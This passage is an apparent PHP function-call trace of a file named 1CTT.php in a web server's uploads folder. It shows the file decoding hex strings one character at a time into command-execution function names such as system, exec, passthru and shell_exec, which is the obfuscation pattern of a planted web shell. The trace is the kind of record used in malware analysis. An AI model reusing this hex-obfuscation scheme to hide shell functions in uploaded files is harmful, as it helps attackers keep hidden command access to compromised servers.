2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	369	0	0.015767	720472	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	369	1	0.015778	720520
3	369	R			99
3	370	0	0.015790	720440	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	370	1	0.015801	720480
3	370	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	371	0	0.015830	720472	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	371	1	0.015841	720520
3	371	R			104
3	372	0	0.015853	720440	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	372	1	0.015864	720480
3	372	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	373	0	0.015899	720472	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	373	1	0.015911	720520
3	373	R			97
3	374	0	0.015937	720440	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	374	1	0.015948	720480
3	374	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	375	0	0.015978	720472	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	375	1	0.015989	720520
3	375	R			114
3	376	0	0.016001	720440	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	376	1	0.016012	720480
3	376	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	377	0	0.016041	720472	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	377	1	0.016052	720520
3	377	R			115
3	378	0	0.016065	720440	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	378	1	0.016076	720480
3	378	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	346	1	0.016106	720448
2	346	R			'htmlspecialchars'
1		A						/var/www/html/uploads/1CTT.php	7	$func[18] = 'htmlspecialchars'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	379	0	0.016141	720448	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'64617465'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 7
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	380	0	0.016182	720480	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	380	1	0.016194	720528
3	380	R			100
3	381	0	0.016206	720448	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	381	1	0.016217	720488
3	381	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	382	0	0.016248	720512	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	382	1	0.016260	720560
3	382	R			97
3	383	0	0.016272	720480	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	383	1	0.016283	720520
3	383	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	384	0	0.016313	720512	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	384	1	0.016325	720560
3	384	R			116
3	385	0	0.016338	720480	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	385	1	0.016349	720520
3	385	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	386	0	0.016380	720512	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	386	1	0.016392	720560
3	386	R			101
3	387	0	0.016404	720480	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	387	1	0.016415	720520
3	387	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	379	1	0.016446	720480
2	379	R			'date'
1		A						/var/www/html/uploads/1CTT.php	7	$func[19] = 'date'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	388	0	0.016479	720480	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66696c656d74696d65'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 17
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	389	0	0.016520	720512	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	389	1	0.016531	720560
3	389	R			102
3	390	0	0.016543	720480	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	390	1	0.016555	720520
3	390	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	391	0	0.016586	720544	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	391	1	0.016597	720592
3	391	R			105
3	392	0	0.016609	720512	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	392	1	0.016623	720552
3	392	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	393	0	0.016654	720544	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	393	1	0.016666	720592
3	393	R			108
3	394	0	0.016679	720512	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	394	1	0.016691	720552
3	394	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	395	0	0.016721	720544	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	395	1	0.016732	720592
3	395	R			101
3	396	0	0.016745	720512	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	396	1	0.016756	720552
3	396	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	397	0	0.016785	720544	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	397	1	0.016797	720592
3	397	R			109
3	398	0	0.016809	720512	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	398	1	0.016821	720552
3	398	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	399	0	0.016851	720544	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	399	1	0.016862	720592
3	399	R			116
3	400	0	0.016875	720512	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	400	1	0.016886	720552
3	400	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	401	0	0.016917	720544	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	401	1	0.016928	720592
3	401	R			105
3	402	0	0.016940	720512	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	402	1	0.016952	720552
3	402	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	403	0	0.016982	720544	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	403	1	0.016993	720592
3	403	R			109
3	404	0	0.017005	720512	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	404	1	0.017016	720552
3	404	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	405	0	0.017046	720552	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	405	1	0.017058	720600
3	405	R			101
3	406	0	0.017070	720520	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	406	1	0.017081	720560
3	406	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	388	1	0.017110	720520
2	388	R			'filemtime'
1		A						/var/www/html/uploads/1CTT.php	7	$func[20] = 'filemtime'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	407	0	0.017144	720520	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'7363616e646972'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 13
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	408	0	0.017185	720552	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	408	1	0.017197	720600
3	408	R			115
3	409	0	0.017209	720520	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	409	1	0.017220	720560
3	409	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	410	0	0.017251	720584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	410	1	0.017262	720632
3	410	R			99
3	411	0	0.017274	720552	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	411	1	0.017286	720592
3	411	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	412	0	0.017316	720584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	412	1	0.017328	720632
3	412	R			97
3	413	0	0.017340	720552	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	413	1	0.017355	720592
3	413	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	414	0	0.017386	720584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	414	1	0.017398	720632
3	414	R			110
3	415	0	0.017410	720552	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	415	1	0.017421	720592
3	415	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	416	0	0.017451	720584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	416	1	0.017463	720632
3	416	R			100
3	417	0	0.017475	720552	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	417	1	0.017486	720592
3	417	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	418	0	0.017516	720584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	418	1	0.017527	720632
3	418	R			105
3	419	0	0.017540	720552	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	419	1	0.017551	720592
3	419	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	420	0	0.017581	720584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	420	1	0.017592	720632
3	420	R			114
3	421	0	0.017604	720552	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	421	1	0.017616	720592
3	421	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	407	1	0.017646	720552
2	407	R			'scandir'
1		A						/var/www/html/uploads/1CTT.php	7	$func[21] = 'scandir'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	422	0	0.017680	720552	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'73797374656d'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	423	0	0.017721	720584	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	423	1	0.017732	720632
3	423	R			115
3	424	0	0.017744	720552	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	424	1	0.017756	720592
3	424	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	425	0	0.017786	720616	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'79'
3	425	1	0.017797	720664
3	425	R			121
3	426	0	0.017809	720584	chr	0		/var/www/html/uploads/1CTT.php	204	1	121
3	426	1	0.017821	720624
3	426	R			'y'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	427	0	0.017851	720616	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	427	1	0.017863	720664
3	427	R			115
3	428	0	0.017875	720584	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	428	1	0.017887	720624
3	428	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	429	0	0.017916	720616	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	429	1	0.017928	720664
3	429	R			116
3	430	0	0.017940	720584	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	430	1	0.017951	720624
3	430	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	431	0	0.017981	720616	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	431	1	0.017993	720664
3	431	R			101
3	432	0	0.018005	720584	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	432	1	0.018016	720624
3	432	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	433	0	0.018047	720616	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	433	1	0.018058	720664
3	433	R			109
3	434	0	0.018073	720584	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	434	1	0.018085	720624
3	434	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	422	1	0.018116	720584
2	422	R			'system'
1		A						/var/www/html/uploads/1CTT.php	7	$func[22] = 'system'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	435	0	0.018149	720584	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'65786563'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 7
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	436	0	0.018190	720616	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	436	1	0.018201	720664
3	436	R			101
3	437	0	0.018214	720584	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	437	1	0.018226	720624
3	437	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	438	0	0.018256	720648	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'78'
3	438	1	0.018268	720696
3	438	R			120
3	439	0	0.018281	720616	chr	0		/var/www/html/uploads/1CTT.php	204	1	120
3	439	1	0.018292	720656
3	439	R			'x'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	440	0	0.018323	720648	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	440	1	0.018334	720696
3	440	R			101
3	441	0	0.018347	720616	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	441	1	0.018358	720656
3	441	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	442	0	0.018388	720648	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	442	1	0.018400	720696
3	442	R			99
3	443	0	0.018412	720616	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	443	1	0.018423	720656
3	443	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	435	1	0.018454	720616
2	435	R			'exec'
1		A						/var/www/html/uploads/1CTT.php	7	$func[23] = 'exec'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	444	0	0.018487	720616	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'7061737374687275'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 15
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	445	0	0.018528	720648	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	445	1	0.018541	720696
3	445	R			112
3	446	0	0.018553	720616	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	446	1	0.018564	720656
3	446	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	447	0	0.018595	720680	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	447	1	0.018607	720728
3	447	R			97
3	448	0	0.018627	720648	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	448	1	0.018638	720688
3	448	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	449	0	0.018669	720680	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	449	1	0.018680	720728
3	449	R			115
3	450	0	0.018693	720648	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	450	1	0.018704	720688
3	450	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	451	0	0.018735	720680	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	451	1	0.018747	720728
3	451	R			115
3	452	0	0.018759	720648	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	452	1	0.018770	720688
3	452	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	453	0	0.018800	720680	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	453	1	0.018817	720728
3	453	R			116
3	454	0	0.018829	720648	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	454	1	0.018841	720688
3	454	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	455	0	0.018871	720680	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	455	1	0.018883	720728
3	455	R			104
3	456	0	0.018895	720648	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	456	1	0.018907	720688
3	456	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	457	0	0.018937	720680	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	457	1	0.018948	720728
3	457	R			114
3	458	0	0.018960	720648	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	458	1	0.018971	720688
3	458	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	459	0	0.019001	720680	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	459	1	0.019013	720728
3	459	R			117
3	460	0	0.019025	720648	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	460	1	0.019036	720688
3	460	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	444	1	0.019066	720656
2	444	R			'passthru'
1		A						/var/www/html/uploads/1CTT.php	7	$func[24] = 'passthru'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	461	0	0.019100	720656	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'7368656c6c5f65786563'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 19
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	462	0	0.019142	720688	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	462	1	0.019153	720736
3	462	R			115
3	463	0	0.019166	720656	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	463	1	0.019177	720696
3	463	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	464	0	0.019208	720720	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	464	1	0.019219	720768
3	464	R			104
3	465	0	0.019231	720688	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	465	1	0.019243	720728
3	465	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	466	0	0.019274	720720	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	466	1	0.019285	720768
3	466	R			101
3	467	0	0.019297	720688	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	467	1	0.019309	720728
3	467	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	468	0	0.019339	720720	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	468	1	0.019351	720768
3	468	R			108
3	469	0	0.019363	720688	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	469	1	0.019374	720728
3	469	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	470	0	0.019404	720720	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	470	1	0.019416	720768
3	470	R			108
3	471	0	0.019428	720688	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	471	1	0.019439	720728
3	471	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	472	0	0.019469	720720	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	472	1	0.019480	720768
3	472	R			95
3	473	0	0.019492	720688	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	473	1	0.019503	720728
3	473	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	474	0	0.019536	720720	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	474	1	0.019548	720768
3	474	R			101
3	475	0	0.019561	720688	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	475	1	0.019573	720728
3	475	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	476	0	0.019603	720720	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'78'
3	476	1	0.019614	720768
3	476	R			120
3	477	0	0.019626	720688	chr	0		/var/www/html/uploads/1CTT.php	204	1	120
3	477	1	0.019637	720728
3	477	R			'x'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	478	0	0.019668	720728	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	478	1	0.019679	720776
3	478	R			101
3	479	0	0.019691	720696	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	479	1	0.019703	720736
3	479	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	480	0	0.019733	720728	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	480	1	0.019744	720776
3	480	R			99
3	481	0	0.019756	720696	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	481	1	0.019767	720736
3	481	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	461	1	0.019797	720696
2	461	R			'shell_exec'
1		A						/var/www/html/uploads/1CTT.php	7	$func[25] = 'shell_exec'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	482	0	0.019831	720696	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6f625f6765745f636f6e74656e7473'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 29
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	483	0	0.019873	720728	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	483	1	0.019887	720776
3	483	R			111
3	484	0	0.019900	720696	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	484	1	0.019928	720736
3	484	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	485	0	0.019960	720760	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'62'
3	485	1	0.019971	720808
3	485	R			98
3	486	0	0.019984	720728	chr	0		/var/www/html/uploads/1CTT.php	204	1	98
3	486	1	0.019995	720768
3	486	R			'b'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	487	0	0.020025	720760	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	487	1	0.020038	720808
3	487	R			95
3	488	0	0.020050	720728	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	488	1	0.020095	720768
3	488	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	489	0	0.020128	720760	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
3	489	1	0.020140	720808
3	489	R			103
3	490	0	0.020153	720728	chr	0		/var/www/html/uploads/1CTT.php	204	1	103
3	490	1	0.020165	720768
3	490	R			'g'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	491	0	0.020195	720760	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	491	1	0.020206	720808
3	491	R			101
3	492	0	0.020219	720728	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	492	1	0.020231	720768
3	492	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	493	0	0.020260	720760	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	493	1	0.020272	720808
3	493	R			116
3	494	0	0.020284	720728	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	494	1	0.020296	720768
3	494	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	495	0	0.020333	720760	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	495	1	0.020346	720808
3	495	R			95
3	496	0	0.020358	720728	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	496	1	0.020370	720768
3	496	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	497	0	0.020400	720760	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	497	1	0.020412	720808
3	497	R			99
3	498	0	0.020424	720728	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	498	1	0.020435	720768
3	498	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	499	0	0.020465	720768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	499	1	0.020477	720816
3	499	R			111
3	500	0	0.020489	720736	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	500	1	0.020500	720776
3	500	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	501	0	0.020531	720768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	501	1	0.020543	720816
3	501	R			110
3	502	0	0.020555	720736	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	502	1	0.020567	720776
3	502	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	503	0	0.020596	720768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	503	1	0.020608	720816
3	503	R			116
3	504	0	0.020621	720736	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	504	1	0.020632	720776
3	504	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	505	0	0.020662	720768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	505	1	0.020674	720816
3	505	R			101
3	506	0	0.020686	720736	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	506	1	0.020698	720776
3	506	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	507	0	0.020728	720768	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	507	1	0.020739	720816
3	507	R			110
3	508	0	0.020751	720736	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	508	1	0.020762	720776
3	508	R			'n'
